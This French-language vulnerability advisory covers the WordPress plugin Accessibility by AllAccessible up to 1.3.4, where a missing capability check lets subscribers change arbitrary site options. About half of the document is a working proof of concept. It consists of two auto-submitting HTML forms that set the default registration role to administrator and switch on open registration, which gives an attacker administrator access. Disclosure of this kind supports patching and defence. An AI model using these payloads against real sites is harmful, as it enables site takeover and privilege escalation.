
Accessibility by AllAccessible <= 1.3.4 - Autorisation manquante pour les utilisateurs authentifiés (Subscriber+) permettant une mise à jour arbitraire d'options
Accessibilité par AllAccessible <= 1.3.4 - Autorisation manquante permettant la mise à jour arbitraire d'options par un utilisateur authentifié (Abonné+)
Le plugin Accessibility by AllAccessible pour WordPress est vulnérable à une modification non autorisée de données pouvant conduire à une escalade de privilèges, en raison d'une vérification de capacité manquante dans la fonction 'AllAccessible_save_settings' dans toutes les versions jusqu'à la version 1.3.4 incluse. Cela permet à des attaquants authentifiés, ayant au moins le niveau Abonné (Subscriber), de mettre à jour des options arbitraires sur le site WordPress. Cela peut être utilisé pour définir le rôle par défaut d'inscription sur Administrateur et activer l'inscription des utilisateurs, permettant ainsi aux attaquants d'obtenir un accès administrateur à un site vulnérable.
Connectez-vous en tant qu'abonné, puis utilisez ces formulaires pour définir le rôle administrateur par défaut, puis le second pour permettre aux utilisateurs de s'inscrire.
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="AllAccessible_save_settings" />
<input type="hidden" name="opt_name" value="default_role" />
<input type="hidden" name="opt_value" value="administrator" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="AllAccessible_save_settings" />
<input type="hidden" name="opt_name" value="users_can_register" />
<input type="hidden" name="opt_value" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>